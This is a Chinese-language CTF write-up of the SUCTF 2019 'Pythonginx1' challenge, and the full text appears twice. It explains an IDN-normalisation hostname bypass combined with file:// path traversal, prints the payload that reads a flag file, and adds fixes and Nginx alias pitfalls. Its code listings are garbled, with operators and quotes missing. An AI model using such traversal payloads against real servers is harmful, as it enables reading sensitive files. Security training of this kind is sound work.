![[SUCTF 2019]Pythonginx1:从IDN编码到文件路径穿越的漏洞利用](images/news1.jpg)
1. 漏洞背景与题目分析这道来自SUCTF 2019的题目名为Pythonginx1结合了Python和Nginx两个关键技术栈。题目场景是一个典型的Web应用漏洞利用场景我们需要通过分析给定的Python后端代码和Nginx配置找到绕过安全限制的方法来获取flag。题目给出了两个关键文件一个是Python Flask应用代码另一个是Nginx配置文件。Flask代码实现了一个简单的URL处理接口主要功能是接收用户输入的URL参数进行一系列处理后返回响应。Nginx配置则定义了请求路由规则包括静态文件处理和反向代理设置。在真实环境中这种PythonNginx的组合非常常见。Python负责业务逻辑处理Nginx作为前端Web服务器处理静态资源和负载均衡。理解这种架构的交互方式对于发现和利用其中的安全漏洞至关重要。2. 关键代码逻辑解析2.1 Flask应用代码分析让我们先仔细看看题目提供的Flask应用代码from flask import Flask, request from urllib.parse import urlparse, urlsplit, urlunsplit import urllib.request app Flask(__name__) app.route(/getUrl, methods[GET, POST]) def getUrl(): url request.args.get(url) host urlparse(url).hostname if host suctf.cc: return 我扌 your problem? 111 parts list(urlsplit(url)) host parts[1] if host suctf.cc: return 我扌 your problem? 222 host newhost [] for h in host.split(.): newhost.append(h.encode(idna).decode(utf-8)) parts[1] ..join(newhost) finalUrl urlunsplit(parts).split( )[0] host urlparse(finalUrl).hostname if host suctf.cc: return urllib.request.urlopen(finalUrl).read() else: return 我扌 your problem? 333这段代码的核心逻辑可以总结为从请求参数中获取URL检查URL的主机名是否为suctf.cc如果是则返回特定错误对URL进行IDN编码处理再次检查处理后的URL主机名是否为suctf.cc如果是则获取该URL内容并返回2.2 Nginx配置分析接下来是Nginx的配置文件server { listen 80; location / { try_files $uri app; } location app { include uwsgi_params; uwsgi_pass unix:///tmp/uwsgi.sock; } location /static { alias /app/static; } # location /flag { # alias /usr/fffffflag; # } }关键配置点包括根路径(/)请求会先尝试直接访问文件失败后转发到uWSGI后端/static路径映射到/app/static目录注释掉的/flag路径原本会映射到/usr/fffffflag文件3. 漏洞利用思路3.1 IDN编码特性IDN(Internationalized Domain Name)编码允许域名包含非ASCII字符。在本题中代码对输入URL的主机名进行了IDN编码newhost [] for h in host.split(.): newhost.append(h.encode(idna).decode(utf-8)) parts[1] ..join(newhost)这个处理过程可能导致域名解析的混淆。例如suctf.cℂ注意最后的ℂ是U2102经过IDN编码后会变成suctf.cc。这为我们绕过主机名检查提供了可能。3.2 文件路径穿越Nginx配置中虽然注释掉了/flag的location但我们仍然可以尝试通过文件协议直接访问flag文件。结合IDN编码特性我们可以构造如下payloadfile://suctf.cℂ/../../../../..//usr/fffffflag这个URL的工作原理是使用file协议绕过HTTP请求限制suctf.cℂ经过IDN编码后变成suctf.cc路径穿越(../../../../../)让我们能够访问系统根目录最终访问到/usr/fffffflag文件3.3 完整利用过程首先检查直接访问flag文件是否可行/getUrl?urlfile:///usr/fffffflag这通常会被安全机制拦截尝试使用IDN编码绕过/getUrl?urlfile://suctf.cℂ/../../../../..//usr/fffffflag这个payload会通过IDN编码将suctf.cℂ转换为suctf.cc通过路径穿越访问系统根目录最终读取/usr/fffffflag文件内容服务器处理流程Flask应用接收URL参数初始主机名检查不触发因为不是直接的suctf.cc经过IDN编码后主机名变为suctf.cc最终通过urlopen读取本地文件内容并返回4. 漏洞防御方案4.1 安全编码实践要防止此类漏洞开发者应该避免直接使用用户提供的URL进行文件操作对文件路径进行规范化处理防止路径穿越限制允许访问的协议如禁用file协议使用白名单机制验证主机名改进后的代码示例from urllib.parse import urlparse import re def is_safe_url(url): parsed urlparse(url) if parsed.scheme not in [http, https]: return False if not re.match(r^[a-zA-Z0-9.-]$, parsed.hostname): return False if .. in parsed.path: return False return True4.2 Nginx安全配置对于Nginx配置建议避免在生产环境使用测试用的flag路径设置严格的访问控制限制location的访问范围安全配置示例location / { deny all; # 默认拒绝所有 } location /api { allow 192.168.1.0/24; # 只允许内网访问 include uwsgi_params; uwsgi_pass unix:///tmp/uwsgi.sock; }5. 相关技术深入5.1 IDN编码详解IDN编码允许域名包含非ASCII字符通过Punycode算法将Unicode字符转换为ASCII兼容编码。例如中文域名例子.测试 → xn--fsq.xn--0zwm56dsuctf.cℂ → suctf.cc这种转换可能导致视觉混淆被用于钓鱼攻击。浏览器通常会将编码后的域名显示为原始Unicode形式增加了识别难度。5.2 Nginx路径处理机制Nginx处理文件路径时遵循以下规则alias指令会完全替换匹配的路径部分root指令会将匹配路径附加到指定目录后try_files按顺序尝试多个路径路径中的../会被处理可能导致目录穿越理解这些规则对于安全配置至关重要。不当的配置可能导致敏感文件泄露如location /static { alias /var/www/; }这样的配置允许通过/static../访问/var目录下的所有文件。6. 实战技巧与经验分享在实际CTF比赛和渗透测试中这类漏洞的利用通常需要仔细阅读源代码理解每一处检查的逻辑尝试各种编码和协议组合如file, gopher, dict等注意注释掉的配置它们可能暗示了敏感路径使用工具测试IDN编码效果如Python的idna模块一个实用的测试脚本示例import idna def test_idna(domain): try: encoded idna.encode(domain).decode() print(fOriginal: {domain} → Encoded: {encoded}) except Exception as e: print(fError encoding {domain}: {e}) test_idna(suctf.cℂ) # 测试特殊字符域名 test_idna(例子.测试) # 测试中文域名在真实环境中我曾遇到过类似配置错误导致的信息泄露案例。一个电商网站因为Nginx配置不当允许通过../穿越访问到数据库备份文件。这种问题往往源于开发人员对路径处理机制理解不足或者直接复制了不安全的配置示例。
[SUCTF 2019]Pythonginx1:从IDN编码到文件路径穿越的漏洞利用
1. 漏洞背景与题目分析这道来自SUCTF 2019的题目名为Pythonginx1结合了Python和Nginx两个关键技术栈。题目场景是一个典型的Web应用漏洞利用场景我们需要通过分析给定的Python后端代码和Nginx配置找到绕过安全限制的方法来获取flag。题目给出了两个关键文件一个是Python Flask应用代码另一个是Nginx配置文件。Flask代码实现了一个简单的URL处理接口主要功能是接收用户输入的URL参数进行一系列处理后返回响应。Nginx配置则定义了请求路由规则包括静态文件处理和反向代理设置。在真实环境中这种PythonNginx的组合非常常见。Python负责业务逻辑处理Nginx作为前端Web服务器处理静态资源和负载均衡。理解这种架构的交互方式对于发现和利用其中的安全漏洞至关重要。2. 关键代码逻辑解析2.1 Flask应用代码分析让我们先仔细看看题目提供的Flask应用代码from flask import Flask, request from urllib.parse import urlparse, urlsplit, urlunsplit import urllib.request app Flask(__name__) app.route(/getUrl, methods[GET, POST]) def getUrl(): url request.args.get(url) host urlparse(url).hostname if host suctf.cc: return 我扌 your problem? 111 parts list(urlsplit(url)) host parts[1] if host suctf.cc: return 我扌 your problem? 222 host newhost [] for h in host.split(.): newhost.append(h.encode(idna).decode(utf-8)) parts[1] ..join(newhost) finalUrl urlunsplit(parts).split( )[0] host urlparse(finalUrl).hostname if host suctf.cc: return urllib.request.urlopen(finalUrl).read() else: return 我扌 your problem? 333这段代码的核心逻辑可以总结为从请求参数中获取URL检查URL的主机名是否为suctf.cc如果是则返回特定错误对URL进行IDN编码处理再次检查处理后的URL主机名是否为suctf.cc如果是则获取该URL内容并返回2.2 Nginx配置分析接下来是Nginx的配置文件server { listen 80; location / { try_files $uri app; } location app { include uwsgi_params; uwsgi_pass unix:///tmp/uwsgi.sock; } location /static { alias /app/static; } # location /flag { # alias /usr/fffffflag; # } }关键配置点包括根路径(/)请求会先尝试直接访问文件失败后转发到uWSGI后端/static路径映射到/app/static目录注释掉的/flag路径原本会映射到/usr/fffffflag文件3. 漏洞利用思路3.1 IDN编码特性IDN(Internationalized Domain Name)编码允许域名包含非ASCII字符。在本题中代码对输入URL的主机名进行了IDN编码newhost [] for h in host.split(.): newhost.append(h.encode(idna).decode(utf-8)) parts[1] ..join(newhost)这个处理过程可能导致域名解析的混淆。例如suctf.cℂ注意最后的ℂ是U2102经过IDN编码后会变成suctf.cc。这为我们绕过主机名检查提供了可能。3.2 文件路径穿越Nginx配置中虽然注释掉了/flag的location但我们仍然可以尝试通过文件协议直接访问flag文件。结合IDN编码特性我们可以构造如下payloadfile://suctf.cℂ/../../../../..//usr/fffffflag这个URL的工作原理是使用file协议绕过HTTP请求限制suctf.cℂ经过IDN编码后变成suctf.cc路径穿越(../../../../../)让我们能够访问系统根目录最终访问到/usr/fffffflag文件3.3 完整利用过程首先检查直接访问flag文件是否可行/getUrl?urlfile:///usr/fffffflag这通常会被安全机制拦截尝试使用IDN编码绕过/getUrl?urlfile://suctf.cℂ/../../../../..//usr/fffffflag这个payload会通过IDN编码将suctf.cℂ转换为suctf.cc通过路径穿越访问系统根目录最终读取/usr/fffffflag文件内容服务器处理流程Flask应用接收URL参数初始主机名检查不触发因为不是直接的suctf.cc经过IDN编码后主机名变为suctf.cc最终通过urlopen读取本地文件内容并返回4. 漏洞防御方案4.1 安全编码实践要防止此类漏洞开发者应该避免直接使用用户提供的URL进行文件操作对文件路径进行规范化处理防止路径穿越限制允许访问的协议如禁用file协议使用白名单机制验证主机名改进后的代码示例from urllib.parse import urlparse import re def is_safe_url(url): parsed urlparse(url) if parsed.scheme not in [http, https]: return False if not re.match(r^[a-zA-Z0-9.-]$, parsed.hostname): return False if .. in parsed.path: return False return True4.2 Nginx安全配置对于Nginx配置建议避免在生产环境使用测试用的flag路径设置严格的访问控制限制location的访问范围安全配置示例location / { deny all; # 默认拒绝所有 } location /api { allow 192.168.1.0/24; # 只允许内网访问 include uwsgi_params; uwsgi_pass unix:///tmp/uwsgi.sock; }5. 相关技术深入5.1 IDN编码详解IDN编码允许域名包含非ASCII字符通过Punycode算法将Unicode字符转换为ASCII兼容编码。例如中文域名例子.测试 → xn--fsq.xn--0zwm56dsuctf.cℂ → suctf.cc这种转换可能导致视觉混淆被用于钓鱼攻击。浏览器通常会将编码后的域名显示为原始Unicode形式增加了识别难度。5.2 Nginx路径处理机制Nginx处理文件路径时遵循以下规则alias指令会完全替换匹配的路径部分root指令会将匹配路径附加到指定目录后try_files按顺序尝试多个路径路径中的../会被处理可能导致目录穿越理解这些规则对于安全配置至关重要。不当的配置可能导致敏感文件泄露如location /static { alias /var/www/; }这样的配置允许通过/static../访问/var目录下的所有文件。6. 实战技巧与经验分享在实际CTF比赛和渗透测试中这类漏洞的利用通常需要仔细阅读源代码理解每一处检查的逻辑尝试各种编码和协议组合如file, gopher, dict等注意注释掉的配置它们可能暗示了敏感路径使用工具测试IDN编码效果如Python的idna模块一个实用的测试脚本示例import idna def test_idna(domain): try: encoded idna.encode(domain).decode() print(fOriginal: {domain} → Encoded: {encoded}) except Exception as e: print(fError encoding {domain}: {e}) test_idna(suctf.cℂ) # 测试特殊字符域名 test_idna(例子.测试) # 测试中文域名在真实环境中我曾遇到过类似配置错误导致的信息泄露案例。一个电商网站因为Nginx配置不当允许通过../穿越访问到数据库备份文件。这种问题往往源于开发人员对路径处理机制理解不足或者直接复制了不安全的配置示例。
